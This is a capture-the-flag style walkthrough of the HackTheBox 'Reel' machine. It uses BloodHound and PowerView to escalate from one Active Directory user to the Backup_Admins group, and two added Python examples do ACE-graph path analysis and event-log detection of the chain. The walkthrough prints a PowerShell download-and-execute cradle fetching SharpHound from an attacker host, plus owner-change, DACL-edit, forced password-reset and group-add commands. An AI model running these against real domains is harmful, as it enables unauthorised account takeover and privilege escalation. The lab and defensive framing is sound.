Attacking A.D.

Using BloodHound

Attacking Windows Active Directory using BloodHound

In this blog post I would like to talk about an amazing tool called BloodHound [1]. It is a tool that I didn't have the chance to play with during my OSCP certification, so I decided to write about how someone could use it to extract the information that would allow them to escalate their privileges up to Domain Admin.

I will do this through the exploitation of a HackTheBox box called Reel. In this box we have a small Active Directory server with a few users that someone will have to pivot through to finally reach the Domain Admin account.

What is BloodHound?

So, BloodHound uses graph theory to present the relationships that users have in an Active Directory environment [2]. It allows an attacker to quickly identify the users they will have to attack in order to gain admin rights. Furthermore, BloodHound has the ability to identify the shortest path that someone would have to take in order to reach a Domain Admin group in the environment.

A quick guide to installing BloodHound in Kali can be found in [3].

ACL & Abusable ACEs

An Access Control List (ACL) is a list of Access Control Entries (ACEs). Each ACE in an ACL associates a security principal (a user, group or computer) with a set of access rights over the object that holds the ACL. As a result, abusing ACEs essentially means exploiting the permissions that one object has over another in the Active Directory environment. Think about a user that is in the Domain Admins group: that user has control over any other object in that domain.

A few of the ACEs that you should keep in mind are described below [4,5,6].

ForceChangePassword: You can change a user's password without the need to know their current password. It can be exploited using the Set-DomainUserPassword method.

AddMembers: The attacker can add users, groups or computers to the group he is trying to attack. It can be exploited using the Add-DomainGroupMember method.

GenericAll: The attacker has full control over the object on which he holds the GenericAll ACE. It can be exploited using the Set-DomainUserPassword or Add-DomainGroupMember methods.

GenericWrite: The ability to update any non-protected target object parameter value. For example, update the “scriptPath” parameter value on a target user object to cause that user to run your specified executable/commands the next time that user logs on. Abused with Set-DomainObject.

WriteOwner: The attacker here is able to change the owner of an object. When this happens the attacker could then, for example, proceed to change the user's password. To take over the object we can use the Set-DomainObjectOwner method.

WriteDACL: The ability to write a new ACE to the target object’s DACL. For example, an attacker may write a new ACE to the target object DACL giving the attacker “full control” of the target object. Abused with Add-NewADObjectAccessControlEntry.

AllExtendedRights: The ability to perform any action associated with extended Active Directory rights against the object. For example, adding principals to a group and force changing a target user’s password are both examples of extended rights. Abused with Set-DomainUserPassword or Add-DomainGroupMember.

Now that we have all that information about abusing ACEs, we can go ahead and exploit them.

Exploit Analysis

Back on the Reel box, I found the SSH password for the user Tom and so I was able to login as him.

I then used Python's SimpleHTTPServer to download and load the SharpHound.ps1 from [7] into the Reel box:

IEX(New-Object Net.WebClient).DownloadString('http://ipaddress/SharpHound.ps1');

Now, in order to run the PowerShell script and collect all the information, someone can type:

Invoke-BloodHound -CollectionMethod All -ZipFileName

Running this saves all the collected data into a zip file. If you unzip it you get a number of .json files that we can pass into BloodHound for analysis.

Analyzing the Results

Now that we have the zip file, all we have to do is move it back to our Kali box where BloodHound is installed, drag and drop it in there, and BloodHound will do the rest.

One of the BloodHound queries that we could run is "Find all Domain Admins". Here we can see the accounts that are members of the Domain Admins group on the Reel box. This way we can find out which user we have to attack in order to gain Domain Admin privileges.

After a little bit of searching in BloodHound, I identified the path below.

As we can see from the graph above, in order to reach the backup_admins group we would need to move from the Tom user to Claire, and from there to the backup_admins group.
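As an added example that is not part of the original post, the script below does on a small scale what BloodHound does with the SharpHound output: it turns the abusable ACEs from the list in the ACL section and group memberships into a directed graph and finds the shortest path from one principal to a target group, here tom -> claire -> Backup_Admins. The JSON layout and the EXAMPLE.LOCAL names are constructed stand-ins for SharpHound's real users.json and groups.json, which carry many more fields.

```python
import json
from collections import deque

# Abusable rights from the post, compared case-insensitively so SharpHound's "WriteDacl"/"AddMember" match too.
ABUSABLE_RIGHTS = {r.lower() for r in ("ForceChangePassword", "AddMembers", "AddMember",
                   "GenericAll", "GenericWrite", "WriteOwner", "WriteDACL", "AllExtendedRights")}

# Constructed sample modelled on the Reel path in the post (EXAMPLE.LOCAL is made up);
# a simplified stand-in for SharpHound's users.json / groups.json.
SAMPLE_JSON = json.dumps({
    "users": [
        {"Name": "TOM@EXAMPLE.LOCAL", "Aces": []},
        {"Name": "CLAIRE@EXAMPLE.LOCAL",
         "Aces": [{"PrincipalName": "TOM@EXAMPLE.LOCAL", "RightName": "WriteOwner"}]}],
    "groups": [
        {"Name": "BACKUP_ADMINS@EXAMPLE.LOCAL", "Members": [],
         "Aces": [{"PrincipalName": "CLAIRE@EXAMPLE.LOCAL", "RightName": "WriteDacl"}]},
        {"Name": "DOMAIN ADMINS@EXAMPLE.LOCAL", "Aces": [],
         "Members": ["ADMINISTRATOR@EXAMPLE.LOCAL"]}]})

def build_graph(raw):
    """Edges: abusable ACE (principal -> controlled object) and membership (member -> group)."""
    graph = {}
    for kind in ("users", "groups"):
        for obj in json.loads(raw).get(kind, []):
            target = obj["Name"]
            graph.setdefault(target, {})
            for ace in obj.get("Aces", []):
                if ace["RightName"].lower() in ABUSABLE_RIGHTS:
                    graph.setdefault(ace["PrincipalName"], {})[target] = ace["RightName"]
            for member in obj.get("Members", []):
                graph.setdefault(member, {})[target] = "MemberOf"
    return graph

def shortest_path(graph, start, goal):
    """BFS; returns [(from, label, to), ...], [] if start == goal, None if unreachable."""
    prev, queue = {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while prev[node] is not None:
                parent, label = prev[node]
                hops.append((parent, label, node))
                node = parent
            return hops[::-1]
        for nxt, label in graph.get(node, {}).items():
            if nxt not in prev:
                prev[nxt] = (node, label)
                queue.append(nxt)
    return None
```

Run against real SharpHound output the same walk tells a defender which ACEs to remove to break every path into a privileged group.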

At the moment we can see that Tom has WriteOwner permissions on Claire. From [5] and the description above, we get that the WriteOwner permission:

Provides the ability to take ownership of an object.
The owner of an object can gain full control rights on the object.
The right to assume ownership of the object.
The user must be an object trustee.
The user cannot transfer the ownership to other users.

As a result, it is possible for Tom to take ownership of the Claire user object using the Set-DomainObjectOwner method. The idea here is to first take ownership of the Claire user object and then give Tom the permission to reset Claire's password. After that we will be able to use SSH to log in as Claire.

In order for the exploit to be successful I used PowerView [8,9]. The second link is the most important one, because HarmJ0y created a gist with the commands that someone needs to know when trying to exploit an A.D. using PowerView.

PS C:\Users\tom> $claire = Get-ADUser claire
PS C:\Users\tom> Get-Acl AD:$claire

From the image above we can see that the current owner of the Claire user object is NT Authority\system. In order for Tom to take ownership of the Claire user object I used the Set-DomainObjectOwner method:

PS C:\Users\tom> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
PS C:\Users\tom> get-acl AD:$claire

We can now give Tom the right to reset Claire's password with the Add-DomainObjectAcl method taken from [9], reset the password using PowerView again, and then log in via SSH as Claire.

1. Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
2. $cred = ConvertTo-SecureString "th!sP@ss" -AsPlainText -force
3. Set-DomainUserPassword -Identity claire -AccountPassword $cred

In order to move from the Claire user object to the Backup_Admins group, we are going to exploit the WriteDACL permissions that Claire has on Backup_Admins.

WriteDACL: Provides the ability to modify security on an object which can lead to Full Control of the object.
The right to modify the DACL in the object security descriptor.
Example: A service account may be granted this right to perform delegation in AD. If an attacker can guess this password (or potentially crack it by Kerberoasting), they now set their own permissions on associated objects which can lead to Full Control of an object which may involve exposure of a LAPS controlled local Administrator password.

Based on that, we can now add Claire in the Backup_Admins group.

1. net group backup_admins
2. net group backup_admins claire /add
3. logout & log back in

We could also use PowerShell and PowerSploit to do this through the use of Add-DomainGroupMember. This method adds a domain user (or group) to an existing domain group [10].

Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
# -Credential expects a PSCredential, so wrap Claire's new password (the SecureString in $cred above) before passing it
$claireCred = New-Object System.Management.Automation.PSCredential('claire', $cred)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Credential $claireCred

As a result, we can now use SSH to log in as Claire and observe that we have Administrator privileges.
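The chain above (owner change, password reset, group addition) leaves a recognisable sequence in the Security log of the domain controller. The following is an added example, not part of the original post, that correlates such events per target account: 5136 (directory service object modified, attribute nTSecurityDescriptor) followed by 4724 (password reset attempt) and then 4728/4732/4756 (member added to a group). The events are constructed and simplified, and 5136 is only written when Directory Service Changes auditing is enabled for the object.

```python
import json
from datetime import datetime, timedelta

GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal group

# Constructed, heavily simplified events (real ones carry many more fields);
# the first three mirror the tom -> claire -> backup_admins chain from the post.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"time": "2018-06-30T10:00:00", "id": 5136, "subject": "tom", "target": "claire",
     "attribute": "nTSecurityDescriptor"},          # owner / DACL of claire rewritten
    {"time": "2018-06-30T10:00:40", "id": 4724, "subject": "tom", "target": "claire"},
    {"time": "2018-06-30T10:05:00", "id": 4728, "subject": "claire", "target": "claire",
     "group": "backup_admins"},
    {"time": "2018-06-30T11:00:00", "id": 4724, "subject": "helpdesk", "target": "bob"},
])

def load_events(text):
    """Parse JSON-lines events and return them sorted by time."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["time"] = datetime.fromisoformat(e["time"])
    return sorted(events, key=lambda e: e["time"])

def first_after(events, start, window, pred):
    """First event satisfying pred with start <= time <= start + window, else None."""
    return next((e for e in events if pred(e) and start <= e["time"] <= start + window), None)

def find_takeover_chains(text, window=timedelta(hours=1)):
    """One finding per account whose security descriptor was modified and whose
    password was then reset within `window`; 'group' is filled when a group
    addition for the same account follows the reset within another `window`."""
    by_target = {}
    for e in load_events(text):
        by_target.setdefault(e["target"], []).append(e)
    findings = []
    for account, evs in by_target.items():
        sd_change = next((e for e in evs if e["id"] == 5136
                          and e.get("attribute") == "nTSecurityDescriptor"), None)
        if sd_change is None:
            continue
        reset = first_after(evs, sd_change["time"], window, lambda e: e["id"] == 4724)
        if reset is None:
            continue
        added = first_after(evs, reset["time"], window, lambda e: e["id"] in GROUP_ADD_EVENTS)
        findings.append({"account": account, "by": sd_change["subject"],
                         "reset_at": reset["time"].isoformat(),
                         "group": added["group"] if added else None})
    return findings
```

The helpdesk reset of bob is not reported because no security descriptor change preceded it, which is what separates this pattern from routine password resets.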


[1] BloodHound
[2] BloodHound Wiki
[3] Installing BloodHound in Kali
[4] ACL Attack Path
[5] Scanning for Active Directory Privileges & Privileged Accounts
[6] Blackhat presentation about Exploiting ACEs
[7] SharpHound PowerShell
[8] PowerView
[9] PowerView 3.0 Tips & Tricks
[10] Add-DomainGroupMember Method